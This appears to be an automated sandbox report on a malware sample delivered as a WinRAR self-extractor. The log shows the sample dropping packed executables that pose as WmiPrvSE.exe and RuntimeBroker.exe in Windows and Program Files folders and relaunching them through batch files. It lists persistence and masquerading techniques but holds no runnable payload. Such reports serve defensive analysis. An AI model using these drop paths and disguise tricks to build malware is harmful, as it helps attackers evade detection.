Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\296c159f5c41a5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\9e8d7a4ca61bd9	Jump to behavior

Source: JAJL2EYBPH.exe

Static file information: File size 2320194 > 1048576

Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: JAJL2EYBPH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: JAJL2EYBPH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: JAJL2EYBPH.exe, work.exe.0.dr
Source:	Binary string: *m.pdb source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BB08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\dll\System.pdb$ source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdbB- source: WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdbS-7 source: WmiPrvSE.exe, 00000016.00000002.2034484726.000000001B01C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdb source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: (@dows\dll\System.pdb source: WmiPrvSE.exe, 0000002F.00000002.2553710900.000000001B64C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B67C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: runas.pdb source: WmiPrvSE.exe, 0000001B.00000002.2157976799.000000001B620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp

Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

File is packed with WinRar

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4912265

Jump to behavior

PE file contains sections with non-standard names

Source: JAJL2EYBPH.exe	Static PE information: section name: .didat
Source: work.exe.0.dr	Static PE information: section name: .didat
Source: pfwa.exe.3.dr	Static PE information: section name: .vmp0
Source: pfwa.exe.3.dr	Static PE information: section name: .vmp1
Source: RuntimeBroker.exe.4.dr	Static PE information: section name: .vmp0
Source: RuntimeBroker.exe.4.dr	Static PE information: section name: .vmp1
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .vmp0
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .vmp1
Source: QmitaxvEcgoLLOqeIEyLx.exe.4.dr	Static PE information: section name: .vmp0
Source: QmitaxvEcgoLLOqeIEyLx.exe.4.dr	Static PE information: section name: .vmp1
Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr	Static PE information: section name: .vmp0
Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr	Static PE information: section name: .vmp1

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA07F0 push ecx; ret	0_2_00BA0803
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9FEFC push eax; ret	0_2_00B9FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A007F0 push ecx; ret	3_2_00A00803
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009FFEFC push eax; ret	3_2_009FFF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_009A8A00 push 0000007Dh; iretd	4_2_009A8A04
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4FEA push edx; ret	4_2_00007FFD9B8A4FF3
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4E15 push esp; ret	4_2_00007FFD9B8A4E16
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4200 pushad ; ret	4_2_00007FFD9B8A4201
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A3B74 push ss; ret	4_2_00007FFD9B8A3B77
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4D97 push esp; ret	4_2_00007FFD9B8A4D98
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A55A9 push esp; iretd	4_2_00007FFD9B8A55D9
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4BD1 push esi; ret	4_2_00007FFD9B8A4BD2
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4CFA push ebp; ret	4_2_00007FFD9B8A4CFE
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A431B push 0000005Fh; ret	4_2_00007FFD9B8A4324
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4B13 push edi; ret	4_2_00007FFD9B8A4B14
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A512D push ecx; ret	4_2_00007FFD9B8A5131
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4F41 push ebx; ret	4_2_00007FFD9B8A4F45
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4C75 push esi; ret	4_2_00007FFD9B8A4C76
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A5072 push edx; ret	4_2_00007FFD9B8A5073
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A5265 push eax; ret	4_2_00007FFD9B8A5266
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4293 push es; iretd	4_2_00007FFD9B8A4294
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A428B pushad ; ret	4_2_00007FFD9B8A428C
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4EA2 push ebx; ret	4_2_00007FFD9B8A4EA3
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA55A9 push esp; iretd	9_2_00007FFD9BAA55D9
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA4293 push es; iretd	9_2_00007FFD9BAA4294
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCEA7F8 push ebx; retf 5F2Bh	9_2_00007FFD9BCEB50A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCEA7F0 push ebx; retf 5F2Bh	9_2_00007FFD9BCEB50A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD55A9 push esp; iretd	15_2_00007FFD9BAD55D9
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD4293 push es; iretd	15_2_00007FFD9BAD4294
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BC2220C push ss; iretd	15_2_00007FFD9BC2222A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BC22F0C push eax; ret	15_2_00007FFD9BC22F39

Source: pfwa.exe.3.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: RuntimeBroker.exe.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: QmitaxvEcgoLLOqeIEyLx.exe.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File written: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\twain_32\WmiPrvSE.exe

Drops PE files

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Windows\twain_32\WmiPrvSE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File created: C:\Windows\twain_32\WmiPrvSE.exe

Jump to dropped file

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
